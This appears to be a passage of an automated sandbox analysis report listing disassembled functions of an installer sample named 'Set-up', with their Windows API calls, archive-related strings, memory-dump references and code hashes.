                                                                                                                                                  • Opcode ID: 4674745a697993694f92702d64389e174ce5edcfb624bbc3de701aa153f63644
                                                                                                                                                  • Instruction ID: 32f1e49b2da12fa493474accc6a321bfaad52419f91ef2a02a0c8f5d2ca2b950
                                                                                                                                                  • Opcode Fuzzy Hash: 4674745a697993694f92702d64389e174ce5edcfb624bbc3de701aa153f63644
                                                                                                                                                  • Instruction Fuzzy Hash: 64E1B570D05244DACF11EBA2C441BEEBBB2AF58308F24446FE445772C2DB786E45CB6A
                                                                                                                                                  Function 00405F02 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405F07
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,Enter password (will not be echoed):,?,?), ref: 00405F30
                                                                                                                                                  • GetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00405F54
                                                                                                                                                  • SetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00405F65
                                                                                                                                                  • SetConsoleMode.KERNEL32(00000000,00000000,?,?,?), ref: 00405F89
                                                                                                                                                  Strings
                                                                                                                                                  • Enter password (will not be echoed):, xrefs: 00405F1B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ConsoleMode$H_prologHandle
                                                                                                                                                  • String ID: Enter password (will not be echoed):
                                                                                                                                                  • API String ID: 2048311603-3720017889
                                                                                                                                                  • Opcode ID: f8cd3e0b57c7b0b044b0da71a7083723b6b607ab9f23dcae3d931d2d2fbc41d5
                                                                                                                                                  • Instruction ID: 5118b2bd0438b802a98943555490a3d0f7b73820210449609ab51453b7f0d9a0
                                                                                                                                                  • Opcode Fuzzy Hash: f8cd3e0b57c7b0b044b0da71a7083723b6b607ab9f23dcae3d931d2d2fbc41d5
                                                                                                                                                  • Instruction Fuzzy Hash: E311A132E001595BDB14EBA58845BEFB7B8DF45315F14057EE401B22D1CB3C5E04CB6A
                                                                                                                                                  Function 00405BA4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405BA9
                                                                                                                                                  • EnterCriticalSection.KERNEL32(004907B8), ref: 00405BBC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8), ref: 00405BCD
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8), ref: 00405C18
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                                                                  • String ID: Anti item $Compressing
                                                                                                                                                  • API String ID: 2532973370-3992608634
                                                                                                                                                  • Opcode ID: 84a01e731ec9b813ad631527adac13777a383dcc7d74e5e92d99fc39fd84ba6e
                                                                                                                                                  • Instruction ID: 3bcaca3dad4c7656dfd1fde45e62e71c6e1b0e5d750669b84379270c4a008202
                                                                                                                                                  • Opcode Fuzzy Hash: 84a01e731ec9b813ad631527adac13777a383dcc7d74e5e92d99fc39fd84ba6e
                                                                                                                                                  • Instruction Fuzzy Hash: 9701D231A04740AFD711AB65C889B6F77E4EB85314F54883FE006A66C1D7BC7888CF69
                                                                                                                                                  Function 0040917F Relevance: 9.1, APIs: 6, Instructions: 73filetimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409184
                                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 0040919D
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 004091C8
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409207
                                                                                                                                                  • SetFileTime.KERNEL32(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409229
                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409237
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Create$CloseErrorH_prologHandleLastTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1562325489-0
                                                                                                                                                  • Opcode ID: 17ce908be797c69452a972f8de4177c119ba57a44d962f58d7c9852e5cad69fc
                                                                                                                                                  • Instruction ID: 47e2de1436f28d6b124216212b8a8df80ebc95ebb38cea474e2a7fc119c2174f
                                                                                                                                                  • Opcode Fuzzy Hash: 17ce908be797c69452a972f8de4177c119ba57a44d962f58d7c9852e5cad69fc
                                                                                                                                                  • Instruction Fuzzy Hash: F5219D31940209BBEF119FA4DC06BEEBBB9EF44714F10466AF510B62E1D3790E10CB65
                                                                                                                                                  Function 004712E0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046E0EA: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E127
                                                                                                                                                    • Part of subcall function 0046E0EA: EnterCriticalSection.KERNEL32(?,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E142
                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046D3F3), ref: 00471331
                                                                                                                                                    • Part of subcall function 0046E14B: LeaveCriticalSection.KERNEL32(?,0046C500,00000009,0046C4EC,00000000,?,00000000,00000000,00000000), ref: 0046E158
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                                                                                                  • String ID: P_I$P_I$``I$``I
                                                                                                                                                  • API String ID: 1866836854-3985449526
                                                                                                                                                  • Opcode ID: 2ab8249112eadd07aa1c39d09e8656833a06fbaf39abdf0de0c55133e4c539af
                                                                                                                                                  • Instruction ID: e33248fec3d6530e6f7be7bfd664efab902c5f3d23cdb2ee9bdb4185c5e73a30
                                                                                                                                                  • Opcode Fuzzy Hash: 2ab8249112eadd07aa1c39d09e8656833a06fbaf39abdf0de0c55133e4c539af
                                                                                                                                                  • Instruction Fuzzy Hash: 994168315042506EEB11CF7CD8853FA7BA1AB06319F34C17BE68D9B2B2C63D8989874D
                                                                                                                                                  Function 0046E49E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0046E4BD
                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0046E4F2
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0046E552
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                  • API String ID: 1385375860-4131005785
                                                                                                                                                  • Opcode ID: 51a187e4078196d8b22c5c0c3889aba2feacd7d81db93f6ba6d27614cf7caef9
                                                                                                                                                  • Instruction ID: 9cff4891fddd193a643b86550510ceb2f2d8a51f2a8f79a2b90ddcbbc0a8e777
                                                                                                                                                  • Opcode Fuzzy Hash: 51a187e4078196d8b22c5c0c3889aba2feacd7d81db93f6ba6d27614cf7caef9
                                                                                                                                                  • Instruction Fuzzy Hash: A8311779901254BDEF3186B25C45BEE37E89B0230CF2404EBE14AD5242FA39DE89871B
                                                                                                                                                  Function 004015C5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
                                                                                                                                                  • API String ID: 3519838083-4253456528
                                                                                                                                                  • Opcode ID: 4a511c5ec6836489367ea132d7d32bcb4f0436f6e69689611c4038a955266b2c
                                                                                                                                                  • Instruction ID: a0cec10b2da544dbc4433d85dd3c69fcd4bb0d0be438a7e7a00ba7e9f4be9ffd
                                                                                                                                                  • Opcode Fuzzy Hash: 4a511c5ec6836489367ea132d7d32bcb4f0436f6e69689611c4038a955266b2c
                                                                                                                                                  • Instruction Fuzzy Hash: CA11C431A043009BD724BB65C881B6F77B1BB44314F148A3FE942632D1CB7EA800D75B
                                                                                                                                                  Function 0046F857 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0046F8B5
                                                                                                                                                  • GetFileType.KERNEL32(00000480), ref: 0046F960
                                                                                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0046F9C3
                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0046F9D1
                                                                                                                                                  • SetHandleCount.KERNEL32 ref: 0046FA08
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1710529072-0
                                                                                                                                                  • Opcode ID: a3a460e97933f9b88f7077922ecc0af6059881cd27cc349a4d0206d45ae9cfcd
                                                                                                                                                  • Instruction ID: 3af2878efde6c6d54491ac0a81efb3299caceca1bd2cbbf9af027a4b9c498bf4
                                                                                                                                                  • Opcode Fuzzy Hash: a3a460e97933f9b88f7077922ecc0af6059881cd27cc349a4d0206d45ae9cfcd
                                                                                                                                                  • Instruction Fuzzy Hash: EA5108B15042019BD7109F28E84476A7BA0EB15368F29467FD4E6CB3E1E738984EC75B
                                                                                                                                                  Function 004094FA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004094FF
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00409543
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 00409524
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,00000000), ref: 0040954D
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000003,?,00000000,?,?,00000000), ref: 00409582
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectory$H_prolog$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 225019141-0
                                                                                                                                                  • Opcode ID: 4718fadee0e517aed5b0bf664f3f7b1d090dac9aa27d81c813e3270ad5ff2c18
                                                                                                                                                  • Instruction ID: 1f3bc6db0a728d9bfd055e8a0f8227e49f7bf46736af2f04f8af0ae3034628ab
                                                                                                                                                  • Opcode Fuzzy Hash: 4718fadee0e517aed5b0bf664f3f7b1d090dac9aa27d81c813e3270ad5ff2c18
                                                                                                                                                  • Instruction Fuzzy Hash: C611D373D04205EFDF11AFA69C814BEBB75EB44358F10007FE905B32D2CA395E418AAA
                                                                                                                                                  Function 00407553 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperW.USER32(00000000,?,?,?,?,?,0040779C), ref: 0040756E
                                                                                                                                                  • GetLastError.KERNEL32(?,0040779C), ref: 0040757A
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,0040779C), ref: 00407595
                                                                                                                                                  • CharUpperA.USER32(?,?,0040779C), ref: 004075AE
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,0040779C), ref: 004075C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$ByteMultiUpperWide$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3939315453-0
                                                                                                                                                  • Opcode ID: 5542f8ac5b04411454b560831cebea15ee82a51659f749881e22f94b9f528b9a
                                                                                                                                                  • Instruction ID: e2d0110e49ed661a2d0575c7225b27184618cce7cf0535423ff90f521c82c0d9
                                                                                                                                                  • Opcode Fuzzy Hash: 5542f8ac5b04411454b560831cebea15ee82a51659f749881e22f94b9f528b9a
                                                                                                                                                  • Instruction Fuzzy Hash: 820156B68142197FDB106BA49CC9DEF7ABCEB05354F000872F502F3681E579AD80877A
                                                                                                                                                  Function 0046DF03 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,004701CB,00470B72,00000000,?,?,00000000,00000001), ref: 0046DF05
                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046DF13
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046DF5F
                                                                                                                                                    • Part of subcall function 0046FA13: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046FB09
                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046DF37
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0046DF48
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2020098873-0
                                                                                                                                                  • Opcode ID: 2579a79d50f51303433f986a8350a333b6317c42f59056469be10e8e5a0e5b73
                                                                                                                                                  • Instruction ID: b9d2e50b28cd5dab27f8086af949c5e4f748ffd9d6768b06feacf392e28a1ef9
                                                                                                                                                  • Opcode Fuzzy Hash: 2579a79d50f51303433f986a8350a333b6317c42f59056469be10e8e5a0e5b73
                                                                                                                                                  • Instruction Fuzzy Hash: 3CF0F631E052115BD7342F70BC0961E3B91EF807B1B10053AF64AD62D0EF298C85C69F
